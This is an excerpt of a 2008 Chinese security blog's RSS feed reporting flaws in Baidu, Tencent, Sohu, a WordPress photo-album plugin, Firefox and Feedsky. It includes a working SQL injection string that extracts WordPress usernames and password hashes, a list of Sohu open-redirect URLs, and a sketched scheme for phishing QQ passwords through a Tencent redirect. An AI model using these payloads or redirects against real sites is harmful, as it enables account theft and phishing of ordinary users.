<p>百度联盟地址：http://union.baidu.com/</p>
<p>下边是截图：</p>

<a href='http://clin003.com/exploits/baidu-search-advertising-across-union-station-loopholes-792/attachment/baidu-spcode/' title='baidu-spcode'><img width="150" height="150" src="http://img.clin003.com/wp-content/uploads/2008/04/baidu-spcode-150x150.jpg" class="attachment-thumbnail" alt="baidu-spcode" title="baidu-spcode" /></a>
<a href='http://clin003.com/exploits/baidu-search-advertising-across-union-station-loopholes-792/attachment/baidu-union-spcode/' title='baidu-union-spcode'><img width="150" height="150" src="http://img.clin003.com/wp-content/uploads/2008/04/baidu-union-spcode-150x150.jpg" class="attachment-thumbnail" alt="baidu-union-spcode" title="baidu-union-spcode" /></a>
<a href='http://clin003.com/exploits/baidu-search-advertising-across-union-station-loopholes-792/attachment/baidu-spcode-ad/' title='baidu-spcode-ad'><img width="150" height="150" src="http://img.clin003.com/wp-content/uploads/2008/04/baidu-spcode-ad-150x150.jpg" class="attachment-thumbnail" alt="baidu-spcode-ad" title="baidu-spcode-ad" /></a>

<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/ideas/baidu-search-history-and-baidu-union-ad-1325/" rel="bookmark" title="Permanent Link: 百度秘密收集用户查询历史推送相关广告（个性化服务？）">百度秘密收集用户查询历史推送相关广告（个性化服务？）</a></li><li><a href="http://clin003.com/exploits/baidu-inter-station-loopholes-2007-11-24-196/" rel="bookmark" title="Permanent Link: 百度跨站漏洞：当前日期(date): 2007-11-24 星期六">百度跨站漏洞：当前日期(date): 2007-11-24 星期六</a></li><li><a href="http://clin003.com/exploits/tencent-experience-center-loopholes-and-the-use-of-inter-station-idea-503/" rel="bookmark" title="Permanent Link: 腾讯体验中心跨站漏洞及利用想法">腾讯体验中心跨站漏洞及利用想法</a></li><li><a href="http://clin003.com/search-engine/baidu-blogsearch-ping-1844/" rel="bookmark" title="Permanent Link: 添加百度博客搜索ping服务">添加百度博客搜索ping服务</a></li><li><a href="http://clin003.com/search-engine/source-medium-detail-baidu-organic-1860/" rel="bookmark" title="Permanent Link: 从百度导入的IP基本恢复！">从百度导入的IP基本恢复！</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/baidu-search-advertising-across-union-station-loopholes-792/" >http://clin003.com/exploits/baidu-search-advertising-across-union-station-loopholes-792/</a> <br /> <a href="http://clin003.com/exploits/baidu-search-advertising-across-union-station-loopholes-792/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/baidu-search-advertising-across-union-station-loopholes-792/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>腾讯体验中心跨站漏洞及利用想法</title>
		<link>http://clin003.com/exploits/tencent-experience-center-loopholes-and-the-use-of-inter-station-idea-503/</link>
		<comments>http://clin003.com/exploits/tencent-experience-center-loopholes-and-the-use-of-inter-station-idea-503/#comments</comments>
		<pubDate>Sat, 08 Mar 2008 06:21:26 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[今日一点]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[QQ]]></category>
		<category><![CDATA[腾讯]]></category>
		<category><![CDATA[跨站]]></category>

		<guid isPermaLink="false">http://clin003.com/exploits/tencent-experience-center-loopholes-and-the-use-of-inter-station-idea-503.shtml</guid>
		<description><![CDATA[直接进入体验中心的地址是http://exp.qq.com/若体验里边的测试内容，需先登录QQ才可以继续填写体验申请表，在登录的过程发现这个： http://exp.qq.com/cgi-bin/present/tec_cgi_go_signin?redirect= http://exp.qq.com/cgi-bin/present/tec_cgi_present_plan_info%3Fplan_id%3D90 地址，很好，后边的应该就是我直接申请体验情况下，而没有让我填写体验表却跳转到登录界面的地址啦，而这个地址会在我登录完QQ后跳转进入。 想想看我直接吧后边的地址换成我的主页地址如：http://exp.qq.com/cgi-bin/present/tec_cgi_go_signin?redirect= http://clin003.com 这个地址是有效的，即使刷新也同样有效。 如图 如果后边我的主页地址更有欺骗性（很像QQ的？或者直接编码）些，我在制作个很像体验中心登录页面的页面？我会提示什么验证码错误之类的错误，然后是不是会有好多人重新登陆QQ号啊，然后他并没有发现这个已经不是开始的哪个页面啦，如果把这个QQ号带密码发回后让他转向到体验中心去填问卷不至于人家产生怀疑 CommentsMarch 8, 2008, wiki writes: it is goneRelated posts:百度跨站漏洞：当前日期(date): 2007-11-24 星期六百度搜索联盟广告跨站漏洞Yahoo！Sorry, Unable to process request at this time &#8212; error 999.主页出现问题，貌似虚拟主机服务商限制session网站建立前应该做的思路规划Copyright &#169; 2007-2010 This feed is building by Lin's Space&#124;Only .本文地址：http://clin003.com/exploits/tencent-experience-center-loopholes-and-the-use-of-inter-station-idea-503/ &#8230; <a href="http://clin003.com/exploits/tencent-experience-center-loopholes-and-the-use-of-inter-station-idea-503/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>直接进入体验中心的地址是http://exp.qq.com/若体验里边的测试内容，需先登录QQ才可以继续填写体验申请表，在登录的过程发现这个：<br />
<code>http://exp.qq.com/cgi-bin/present/tec_cgi_go_signin?redirect=</p>
<p>http://exp.qq.com/cgi-bin/present/tec_cgi_present_plan_info%3Fplan_id%3D90</code></p>
<p>地址，很好，后边的应该就是我直接申请体验情况下，而没有让我填写体验表却跳转到登录界面的地址啦，而这个地址会在我登录完QQ后跳转进入。</p>
<p>想想看我直接吧后边的地址换成我的主页地址如：<code>http://exp.qq.com/cgi-bin/present/tec_cgi_go_signin?redirect=</p>
<p>http://clin003.com</code></p>
<p>这个地址是有效的，即使刷新也同样有效。</p>
<p>如图</p>
<p><a href="http://clin003.com/wp-content/uploads/2008/03/qqexp.jpg" title="腾讯体验中心跨站利用"><img src="http://clin003.com/wp-content/uploads/2008/03/qqexp.jpg" alt="腾讯体验中心跨站利用" /></a></p>
<p>如果后边我的主页地址更有欺骗性（很像QQ的？或者直接编码）些，我在制作个很像体验中心登录页面的页面？我会提示什么验证码错误之类的错误，然后是不是会有好多人重新登陆QQ号啊，然后他并没有发现这个已经不是开始的哪个页面啦，如果把这个QQ号带密码发回后让他转向到体验中心去填问卷不至于人家产生怀疑</p>
<p><a href="http://clin003.com/exploits/tencent-experience-center-loopholes-and-the-use-of-inter-station-idea-503.shtml/%e8%85%be%e8%ae%af%e4%bd%93%e9%aa%8c%e4%b8%ad%e5%bf%83%e8%b7%a8%e7%ab%99%e5%88%a9%e7%94%a8-%e6%ac%ba%e9%aa%97%e9%a1%b5%e9%9d%a2/" rel="attachment wp-att-505" title="腾讯体验中心跨站利用-欺骗页面"><img src="http://clin003.com/wp-content/uploads/2008/03/qqexp-byclin003.jpg" alt="腾讯体验中心跨站利用-欺骗页面" /></a></p>
<p><font color="#ff0000"><br />
</font></p>
<hr /><h2>Comments</h2><ul><li><a href="http://clin003.com/exploits/tencent-experience-center-loopholes-and-the-use-of-inter-station-idea-503/#comment-97">March  8, 2008</a>, wiki writes: it is gone</li></ul><hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/exploits/baidu-inter-station-loopholes-2007-11-24-196/" rel="bookmark" title="Permanent Link: 百度跨站漏洞：当前日期(date): 2007-11-24 星期六">百度跨站漏洞：当前日期(date): 2007-11-24 星期六</a></li><li><a href="http://clin003.com/exploits/baidu-search-advertising-across-union-station-loopholes-792/" rel="bookmark" title="Permanent Link: 百度搜索联盟广告跨站漏洞">百度搜索联盟广告跨站漏洞</a></li><li><a href="http://clin003.com/ideas/sorry-unable-to-process-request-at-this-time-error-999-1993/" rel="bookmark" title="Permanent Link: Yahoo！Sorry, Unable to process request at this time &#8212; error 999.">Yahoo！Sorry, Unable to process request at this time &#8212; error 999.</a></li><li><a href="http://clin003.com/about/web-space-clin003-get-error-382/" rel="bookmark" title="Permanent Link: 主页出现问题，貌似虚拟主机服务商限制session">主页出现问题，貌似虚拟主机服务商限制session</a></li><li><a href="http://clin003.com/ideas/web-site-should-be-done-before-the-establishment-of-the-idea-of-planning-286/" rel="bookmark" title="Permanent Link: 网站建立前应该做的思路规划">网站建立前应该做的思路规划</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/tencent-experience-center-loopholes-and-the-use-of-inter-station-idea-503/" >http://clin003.com/exploits/tencent-experience-center-loopholes-and-the-use-of-inter-station-idea-503/</a> <br /> <a href="http://clin003.com/exploits/tencent-experience-center-loopholes-and-the-use-of-inter-station-idea-503/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/tencent-experience-center-loopholes-and-the-use-of-inter-station-idea-503/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>搜狐营销广告服务跨站漏洞[doc.go.sohu.com*url=]</title>
		<link>http://clin003.com/exploits/sohu-marketing-advertising-services-doc-go-sohu-com-cross-site-loopholes-452/</link>
		<comments>http://clin003.com/exploits/sohu-marketing-advertising-services-doc-go-sohu-com-cross-site-loopholes-452/#comments</comments>
		<pubDate>Tue, 19 Feb 2008 09:05:03 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[今日一点]]></category>
		<category><![CDATA[代码调试]]></category>
		<category><![CDATA[搜索引擎]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[flash]]></category>
		<category><![CDATA[sohu]]></category>
		<category><![CDATA[搜狐]]></category>
		<category><![CDATA[跨站]]></category>

		<guid isPermaLink="false">http://clin003.com/exploits/sohu-marketing-advertising-services-doc-go-sohu-com-cross-site-loopholes-452.shtml</guid>
		<description><![CDATA[看看下边这个转向到哪里啦http://doc.go.sohu.com/200712/6e97cd2fea9a0f8ac95439405c4ca95a.php?url=http://clin003.com 以下为查到的包含漏洞的页面（仅仅通过搜索引擎的索引结果） 这些链接在sohu都是在flash文件广告中的，所以baidu是搜不出来的，因为google的蜘蛛已经可以读flash文件中的部分文本啦，使用这个关键字搜索google就可以：site:sohu.com [doc.go.sohu.com*url=] 显然在club中出现的是已经利用的链接，下面的flash和专题新闻中的才是sohu真正使用的链接形式。 百度中找 doc.go.sohu.com url你将发现已经有很多利用的“恶意链接”啦，百度一下，找到相关网页约905篇，用时0.001秒 google中找[doc.go.sohu.com*url=]，约有1,390项符合[doc.go.sohu.com*url=]的查询结果，以下是第1-10项 ，不过google中部分标有“该网站可能含有恶意软件，有可能会危害您的电脑。”。 漏洞的成因很可能就是设计广告跳转记录代码的工作人员为啦以后方便使用就这样写啦个“通用代码”而没想到被发现会造成多少信任搜狐的网民受伤！！ 以下是通过搜索引擎得到的部分可以利用的链接（请学习为目的，不要拿去害人） http://doc.go.sohu.com/200801/5cb05572fda7c20a914842413d61ae7d.php?url= http://doc.go.sohu.com/200712/d82c5aba39716d4eb8152d976a2da482.php?url= http://doc.go.sohu.com/200712/e49df42d95615e85312aa0d030a2e552.php?url= http://doc.go.sohu.com/200710/91e2420557be06fc6b4db18e6c7e43b8.php?url= http://doc.go.sohu.com/200709/fd89d3a23c26c83163939a489fac349b.php?url= http://doc.go.sohu.com/200708/adf56d76ba663e3db61b83e84384a141.php?url= http://doc.go.sohu.com/200707/9b5c09c5c3cb8d856393a150683a5d92.php? url= http://doc.go.sohu.com/200706/fa9cda8c2a8455dc7e69465a16d48565.php?url= http://doc.go.sohu.com/200706/1a22b9706f5ee9794ee29582de28d8a7.php?url= http://doc.go.sohu.com/200705/df7fe00bc4bdb3ab1891dd6be56aa73a.php?url= http://doc.go.sohu.com/200704/92d82b0a5606d9025e44b161597c0180.php?url= http://doc.go.sohu.com/200704/cb19f7e8aa1d533134eea9c1197c423b.php?url= http://doc.go.sohu.com/200703/e463ac8934207e079c5500ebddf964e1.php?url= http://doc.go.sohu.com/200702/4788bbdf19b48e08a119cea260a63aaf.php?url= CommentsFebruary 19, 2008, wiki writes: http://clin003.com/exploits/sohu-marketing-advertising-services-doc-go-sohu-com-cross-site-loopholes-452.shtml 搜狐营销广告服务跨站漏洞[doc.go.sohu.com*url=]就是看到别人给你发doc.go.sohu.com样的网址都不要点Related posts:今日杂碎：调整广告形式，让广告看起来不像广告2008北京奥运会开幕式ing 晚上8点今日杂碎：Google市值已超通用电气,年营收不到后者1/8有意思的比喻：看Google新版索引系统“咖啡因”今日杂碎：4月1日全球上百家大型网站将面临DDOS主流攻击Copyright &#169; 2007-2010 This feed &#8230; <a href="http://clin003.com/exploits/sohu-marketing-advertising-services-doc-go-sohu-com-cross-site-loopholes-452/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>看看下边这个转向到哪里啦<a href="http://doc.go.sohu.com/200712/6e97cd2fea9a0f8ac95439405c4ca95a.php?url=http://clin003.com" title="Lin’s空间|Only--搜狐营销广告服务跨站漏洞">http://doc.go.sohu.com/200712/6e97cd2fea9a0f8ac95439405c4ca95a.php?url=http://clin003.com</a></p>
<p>以下为查到的包含漏洞的页面（仅仅通过搜索引擎的索引结果）</p>
<p>这些链接在sohu都是在flash文件广告中的，所以baidu是搜不出来的，因为google的蜘蛛已经可以读flash文件中的部分文本啦，使用这个关键字搜索google就可以：<a href="http://www.google.cn/search?q=site:sohu.com+%5Bdoc.go.sohu.com*url%3D%5D&amp;complete=1&amp;hl=zh-CN&amp;rlz=1B3GGGL_zh-CNCN263&amp;filter=0" title="sohu.com 上约有 15 项符合[doc.go.sohu.com*url=]的查询结果，以下是第 1 - 10 项 （搜索用时 0.24 秒）">site:sohu.com [doc.go.sohu.com*url=]</a><br />
<img src="http://clin003.com/wp-content/uploads/2008/02/sohu-com-doc-go-sohu-com.jpg" alt="sohu.com 上约有 15 项符合[doc.go.sohu.com*url=]的查询结果，以下是第 1 - 10 项 （搜索用时 0.24 秒）" /><br />
显然在club中出现的是已经利用的链接，下面的flash和专题新闻中的才是sohu真正使用的链接形式。</p>
<blockquote><p>百度中找 doc.go.sohu.com url你将发现已经有很多利用的“恶意链接”啦，百度一下，找到相关网页约905篇，用时0.001秒</p>
<p>google中找[doc.go.sohu.com*url=]，<font size="-1">约有<strong>1,390</strong>项符合<strong>[doc.go.sohu.com*url=]</strong>的查询结果，以下是第<strong>1</strong>-<strong>10</strong>项</font> ，不过google中部分标有“<font size="-1"><a href="http://www.google.cn/support/bin/answer.py?answer=45449&amp;topic=360&amp;hl=zh-CN&amp;sa=X&amp;oi=malwarewarninglink&amp;resnum=6&amp;ct=help">该网站可能含有恶意软件，有可能会危害您的电脑。</a></font>”。</p></blockquote>
<p><font color="#ff0000"><strong>漏洞的成因很可能就是设计广告跳转记录代码的工作人员为啦以后方便使用就这样写啦个“通用代码”而没想到被发现会造成多少信任搜狐的网民受伤！！</strong></font></p>
<p>以下是通过搜索引擎得到的部分可以利用的链接<strong><font color="#ff0000">（请学习为目的，不要拿去害人）</font></strong></p>
<blockquote><p>http://doc.go.sohu.com/200801/5cb05572fda7c20a914842413d61ae7d.php?url=</p>
<p>http://doc.go.sohu.com/200712/d82c5aba39716d4eb8152d976a2da482.php?url=</p>
<p>http://doc.go.sohu.com/200712/e49df42d95615e85312aa0d030a2e552.php?url=</p>
<p>http://doc.go.sohu.com/200710/91e2420557be06fc6b4db18e6c7e43b8.php?url=</p>
<p>http://doc.go.sohu.com/200709/fd89d3a23c26c83163939a489fac349b.php?url=</p>
<p>http://doc.go.sohu.com/200708/adf56d76ba663e3db61b83e84384a141.php?url=</p>
<p>http://doc.go.sohu.com/200707/9b5c09c5c3cb8d856393a150683a5d92.php?</p>
<p><wbr></wbr>url=</p>
<p>http://doc.go.sohu.com/200706/fa9cda8c2a8455dc7e69465a16d48565.php?url=</p>
<p>http://doc.go.sohu.com/200706/1a22b9706f5ee9794ee29582de28d8a7.php?url=</p>
<p>http://doc.go.sohu.com/200705/df7fe00bc4bdb3ab1891dd6be56aa73a.php?url=</p>
<p>http://doc.go.sohu.com/200704/92d82b0a5606d9025e44b161597c0180.php?url=</p>
<p>http://doc.go.sohu.com/200704/cb19f7e8aa1d533134eea9c1197c423b.php?url=</p>
<p>http://doc.go.sohu.com/200703/e463ac8934207e079c5500ebddf964e1.php?url=</p>
<p>http://doc.go.sohu.com/200702/4788bbdf19b48e08a119cea260a63aaf.php?url=</p></blockquote>
<hr /><h2>Comments</h2><ul><li><a href="http://clin003.com/exploits/sohu-marketing-advertising-services-doc-go-sohu-com-cross-site-loopholes-452/#comment-83">February  19, 2008</a>, wiki writes: http://clin003.com/exploits/sohu-marketing-advertising-services-doc-go-sohu-com-cross-site-loopholes-452.shtml 搜狐营销广告服务跨站漏洞[doc.go.sohu.com*url=]就是看到别人给你发doc.go.sohu.com样的网址都不要点</li></ul><hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/ideas/adjustment-forms-of-advertising-so-that-advertising-does-not-look-like-ads-1709/" rel="bookmark" title="Permanent Link: 今日杂碎：调整广告形式，让广告看起来不像广告">今日杂碎：调整广告形式，让广告看起来不像广告</a></li><li><a href="http://clin003.com/ideas/beijing-2008-olympic-games-1431/" rel="bookmark" title="Permanent Link: 2008北京奥运会开幕式ing 晚上8点">2008北京奥运会开幕式ing 晚上8点</a></li><li><a href="http://clin003.com/ideas/google-and-ge-now-1700/" rel="bookmark" title="Permanent Link: 今日杂碎：Google市值已超通用电气,年营收不到后者1/8">今日杂碎：Google市值已超通用电气,年营收不到后者1/8</a></li><li><a href="http://clin003.com/internet/google-caffeine-1972/" rel="bookmark" title="Permanent Link: 有意思的比喻：看Google新版索引系统“咖啡因”">有意思的比喻：看Google新版索引系统“咖啡因”</a></li><li><a href="http://clin003.com/ideas/april-1-100-on-the-global-web-will-face-large-scale-ddos-attack-mainstream-1667/" rel="bookmark" title="Permanent Link: 今日杂碎：4月1日全球上百家大型网站将面临DDOS主流攻击">今日杂碎：4月1日全球上百家大型网站将面临DDOS主流攻击</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/sohu-marketing-advertising-services-doc-go-sohu-com-cross-site-loopholes-452/" >http://clin003.com/exploits/sohu-marketing-advertising-services-doc-go-sohu-com-cross-site-loopholes-452/</a> <br /> <a href="http://clin003.com/exploits/sohu-marketing-advertising-services-doc-go-sohu-com-cross-site-loopholes-452/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/sohu-marketing-advertising-services-doc-go-sohu-com-cross-site-loopholes-452/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>WordPress Photo album Remote SQL Injection Vulnerability</title>
		<link>http://clin003.com/exploits/wordpress-photo-album-remote-sql-injection-vulnerability-451/</link>
		<comments>http://clin003.com/exploits/wordpress-photo-album-remote-sql-injection-vulnerability-451/#comments</comments>
		<pubDate>Mon, 18 Feb 2008 15:39:51 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[wordpress支持]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[admin]]></category>
		<category><![CDATA[Photo]]></category>
		<category><![CDATA[Remote SQL Injection]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[权限]]></category>
		<category><![CDATA[注入]]></category>

		<guid isPermaLink="false">http://clin003.com/wp-use/wordpress-photo-album-remote-sql-injection-vulnerability-451.shtml</guid>
		<description><![CDATA[EXAMPLEhttp://xxxxxxxx/?page_id=13&#038;album= [exploit]EXPLOİTS@BUN&#038;photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201# WordPress album PHOTO SQL Injection# AUTHOR : S@BUN## HOME 1 : http://www.milw0rm.com/author/1334#建议修改admin用户权限并建立一个不用于发文章的管理员用户或者直接进数据库修改admin为其他名字 CommentsFebruary 18, 2008, wiki writes: This plugin is designed to easily manage and display yourphoto albums within yourWordPress site.Plugin Admin FeaturesYou can find the plugin admin &#8230; <a href="http://clin003.com/exploits/wordpress-photo-album-remote-sql-injection-vulnerability-451/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>EXAMPLE<br />http://xxxxxxxx/?page_id=13&#038;album= [exploit]<br />EXPLOİT<br />S@BUN&#038;photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201<br /># WordPress album PHOTO SQL Injection# AUTHOR : S@BUN## HOME 1 : http://www.milw0rm.com/author/1334#<br />建议修改admin用户权限并建立一个不用于发文章的管理员用户或者直接进数据库修改admin为其他名字</p>
<hr /><h2>Comments</h2><ul><li><a href="http://clin003.com/exploits/wordpress-photo-album-remote-sql-injection-vulnerability-451/#comment-82">February  18, 2008</a>, wiki writes: This plugin is designed to easily manage and display yourphoto albums within yourWordPress site.Plugin Admin FeaturesYou can find the plugin admin section under Manage then submenu Photos.Manage and create albumsMove photos to and from albumsUpload and delete photos</li></ul><hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/about/posts-pr-1274/" rel="bookmark" title="Permanent Link: 偶然间发现页面也有PR啦！">偶然间发现页面也有PR啦！</a></li><li><a href="http://clin003.com/ideas/discuz-plugin-exploits-1800/" rel="bookmark" title="Permanent Link: 使用Discuz插件的同学需要注意了">使用Discuz插件的同学需要注意了</a></li><li><a href="http://clin003.com/wp-use/upgrading-wordpress-263-1550/" rel="bookmark" title="Permanent Link: 紧急更新至WordPress 2.6.3">紧急更新至WordPress 2.6.3</a></li><li><a href="http://clin003.com/ideas/google-code-photo-viewer-and-photo-uploader-1573/" rel="bookmark" title="Permanent Link: 今日杂碎：谷歌出的两个很酷的DZ论坛图片插件">今日杂碎：谷歌出的两个很酷的DZ论坛图片插件</a></li><li><a href="http://clin003.com/google/forum-photo-viewer-1655/" rel="bookmark" title="Permanent Link: 谷歌看图升级啦">谷歌看图升级啦</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/wordpress-photo-album-remote-sql-injection-vulnerability-451/" >http://clin003.com/exploits/wordpress-photo-album-remote-sql-injection-vulnerability-451/</a> <br /> <a href="http://clin003.com/exploits/wordpress-photo-album-remote-sql-injection-vulnerability-451/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/wordpress-photo-album-remote-sql-injection-vulnerability-451/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Firefox 2.0.0.12暴目录穿越（directory traversal）漏洞</title>
		<link>http://clin003.com/exploits/firefox-20012-directory-traversal-420/</link>
		<comments>http://clin003.com/exploits/firefox-20012-directory-traversal-420/#comments</comments>
		<pubDate>Mon, 11 Feb 2008 14:52:53 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[漏洞]]></category>
		<category><![CDATA[directory traversal]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[目录穿越]]></category>

		<guid isPermaLink="false">http://clin003.com/exploits/firefox-20012%e6%9a%b4%e7%9b%ae%e5%bd%95%e7%a9%bf%e8%b6%8a%ef%bc%88directory-traversal%ef%bc%89%e6%bc%8f%e6%b4%9e-420.shtml</guid>
		<description><![CDATA[Firefox 2.0.0.12默认设置存在严重漏洞，预计2.0.0.13将会很快推出。是目录穿越（directory traversal）漏洞，攻击者可以使用view-source机制查看所有Firefox的参数设置，或是Firefox安装目录下的所有文件，不需要任何强制设置或插件帮助。比如“resource:///”默认会直接定位到“file:///C:/Program Files/Mozilla Firefox/”。 Related posts:Firefox 3 RC1提供更新秀一下我用的几个Firefox插件firefox 3 beta 5发布相对ie谷歌更喜欢firefox？Windows下配置Apache虚拟主机(VirtualHost)Copyright &#169; 2007-2010 This feed is building by Lin's Space&#124;Only .本文地址：http://clin003.com/exploits/firefox-20012-directory-traversal-420/ 雁过留言. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)]]></description>
			<content:encoded><![CDATA[<p>Firefox 2.0.0.12默认设置存在严重漏洞，预计2.0.0.13将会很快推出。是目录穿越（directory traversal）漏洞，攻击者可以使用view-source机制查看所有Firefox的参数设置，或是Firefox安装目录下的所有文件，不需要任何强制设置或插件帮助。比如“resource:///”默认会直接定位到“file:///C:/Program Files/Mozilla Firefox/”。</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/suggested-contents/firefox-3-release-candidate-release-notes-1130/" rel="bookmark" title="Permanent Link: Firefox 3 RC1提供更新">Firefox 3 RC1提供更新</a></li><li><a href="http://clin003.com/ideas/show-firefox-add-ons-1815/" rel="bookmark" title="Permanent Link: 秀一下我用的几个Firefox插件">秀一下我用的几个Firefox插件</a></li><li><a href="http://clin003.com/suggested-contents/firefox-3-beta-5-628/" rel="bookmark" title="Permanent Link: firefox 3 beta 5发布">firefox 3 beta 5发布</a></li><li><a href="http://clin003.com/google/google-is-more-like-firefox-than-ie-533/" rel="bookmark" title="Permanent Link: 相对ie谷歌更喜欢firefox？">相对ie谷歌更喜欢firefox？</a></li><li><a href="http://clin003.com/servers/windows-configure-apache-virtualhost-1850/" rel="bookmark" title="Permanent Link: Windows下配置Apache虚拟主机(VirtualHost)">Windows下配置Apache虚拟主机(VirtualHost)</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/firefox-20012-directory-traversal-420/" >http://clin003.com/exploits/firefox-20012-directory-traversal-420/</a> <br /> <a href="http://clin003.com/exploits/firefox-20012-directory-traversal-420/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/firefox-20012-directory-traversal-420/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>恶搞feedsky域名绑定（feedsky的一个小bug）</title>
		<link>http://clin003.com/exploits/practical-jokes-feedsky-binding-domain-feedsky-a-small-bug-395/</link>
		<comments>http://clin003.com/exploits/practical-jokes-feedsky-binding-domain-feedsky-a-small-bug-395/#comments</comments>
		<pubDate>Tue, 29 Jan 2008 07:28:40 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[今日一点]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[bug]]></category>
		<category><![CDATA[feed]]></category>
		<category><![CDATA[Feedsky]]></category>
		<category><![CDATA[rss]]></category>
		<category><![CDATA[rss烧录]]></category>

		<guid isPermaLink="false">http://clin003.com/about/practical-jokes-feedsky-binding-domain-feedsky-a-small-bug-395.shtml</guid>
		<description><![CDATA[feedsky的域名绑定貌似更换好几天啦，这次去更改下域名解析，发现feedsky的一小bug 看图： feedsky绑定的结果： 可喜的是并没有对其他用户造成什么影响，呵呵:) 我现在还改回来，以免以后还要去改！！，也欢迎来订阅我的Rss CommentsFebruary 21, 2008, Src writes: 其实这个不算bug了，呵呵February 22, 2008, wiki writes: Src:发现后就通知官方客服啦!现在确实修复好啦Related posts:验证FeedSky★经典★恶搞他人大全■搞跨·#愚人节■搜索引擎的ping服务地址small enough and smart enough linux(Damn Small Linux v4.2.3 Final )百度的新年愿景Copyright &#169; 2007-2010 This feed is building by Lin's Space&#124;Only .本文地址：http://clin003.com/exploits/practical-jokes-feedsky-binding-domain-feedsky-a-small-bug-395/ 雁过留言. (Digital Fingerprint: &#8230; <a href="http://clin003.com/exploits/practical-jokes-feedsky-binding-domain-feedsky-a-small-bug-395/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>feedsky的域名绑定貌似更换好几天啦，这次去更改下域名解析，发现feedsky的一小bug</p>
<p>看图：</p>
<p><img src="http://clin003.com/wp-content/uploads/2008/01/feedsky-feed.JPG" alt="feedsky域名绑定没有过滤域名而是只检查啦域名解析的真实性" /></p>
<h2>feedsky绑定的结果：</h2>
<p><img src="http://clin003.com/wp-content/uploads/2008/01/feedsky-mydomain-feedsky-com.JPG" alt="来看看feedsky绑定的结果" /></p>
<p>可喜的是并没有对其他用户造成什么影响，呵呵:)</p>
<p>我现在还改回来，以免以后还要去改！！，也欢迎来订阅我的<a href="http://clin003.com/feed/" title="我的feed">Rss</a></p>
